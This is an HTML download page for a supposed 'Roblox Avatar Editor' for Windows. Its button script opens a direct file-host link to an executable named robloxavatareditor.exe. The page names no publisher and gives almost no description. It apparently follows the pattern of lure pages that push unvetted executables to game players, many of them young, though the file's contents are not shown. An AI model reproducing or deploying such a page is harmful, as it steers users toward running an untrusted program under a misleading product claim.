
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Roblox Avatar Editor Download</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f4f4f4;
        }

        nav {
            background-color: #333;
            color: white;
            padding: 10px 0;
            text-align: center;
        }

        nav h1 {
            margin: 0;
            font-size: 2em;
        }

        .content {
            padding: 20px;
            text-align: center;
        }

        .nav-button {
            display: inline-block;
            padding: 10px 20px;
            background-color: #007bff;
            color: white;
            text-decoration: none;
            border-radius: 5px;
            margin-top: 20px;
border: none;
        }

        .nav-button:hover {
            background-color: #0056b3;
        }
    </style>
</head>
<body>

    <nav>
        <h1>WEBHTM</h1>
    </nav>

    <div class="content">
        <p>Install Roblox Avatar Editor for Windows</p>
        <p>This program allows you to change your Roblox avatar with customization options and a intuitive interface</p>
        <P>Click the button below to download the program.</P>
        <button onclick=winx() class="nav-button">Download for Windows</button>
    </div>
    <script>
        function winx() {
            
            window.open("https://download1323.mediafire.com/frcx5ucro0fgh523FGG7wONLFSOddZvrpP7xJuEstzMzjAeIDVgDChcsQ0UdSQsp5e4Nkvx4kVX_ZqCKrC_9vahfkHg0xrjKkhFW_y_UxCY1830EHhyfZF8eny0JULoElthtZ3mKFc0bUADSf85IufUMszJlDxpOhaaMlAP3cIjJ3HIb/ymuasgp9aiuzt8k/robloxavatareditor.exe")
        }
    </script>
    
